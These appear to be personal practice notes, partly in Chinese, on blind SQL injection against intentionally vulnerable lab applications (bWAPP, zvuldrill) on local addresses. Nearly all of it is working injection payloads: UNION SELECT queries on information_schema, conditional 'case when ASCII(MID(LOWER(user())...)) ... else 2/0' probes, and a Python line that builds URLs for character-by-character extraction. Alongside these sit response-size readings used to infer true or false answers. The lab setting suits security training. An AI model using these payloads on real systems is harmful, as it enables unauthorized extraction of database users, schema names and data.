http://192.168.52.128/bWAPP/bWAPP/sqli_2.php?action=go&movie=100+union+select+1,2,3,4,5,6,7+from+information_schema.schemata+where+case+when+ASCII(MID(LOWER(user()),1,1))=114+then+1+else+2/0+end+%23
http://192.168.52.128/test2/zvuldrill-master/search.php?search=1%'+union+select+1,2,3,4+from+information_schema.schemata+where+case+when+ASCII(MID(LOWER(user()),1,1))=115+then+1+else+0+end%23

url = "http://127.0.0.1/phproot/2.php?id=case when ASCII(MID(LOWER(user())," + str(i) + ",1))=" + str(ord(_str))+" then 1 else 2/0 end"
http://192.168.52.128/bWAPP/bWAPP/sqli_2.php?action=go&movie=case when ASCII(MID(LOWER(user()),1,1))=114 then 1 else 2/0 end

#通过标签和包的大小或者包的内容判断是否正确

bwapp
orderby = 7

        114 19 14286

        115 15 14255


case+when+ASCII(MID(LOWER(user()),1,1))=114+then+1+else+2/0+end
    user()
        114 19 14433
        115 15 14263


zvuldrill

    orderby=4

    database()
        z 14 3778

        x 12 3749

    user()
        z 14 3774

        x 12 3745


# 2/0可以被0或者x/0代替
# dataBaseName只要是存在的数据库都行


http://localhost/test2/zvuldrill-master/search.php?search=1%' union select 1,schema_name,3,4 from information_schema.schemata%23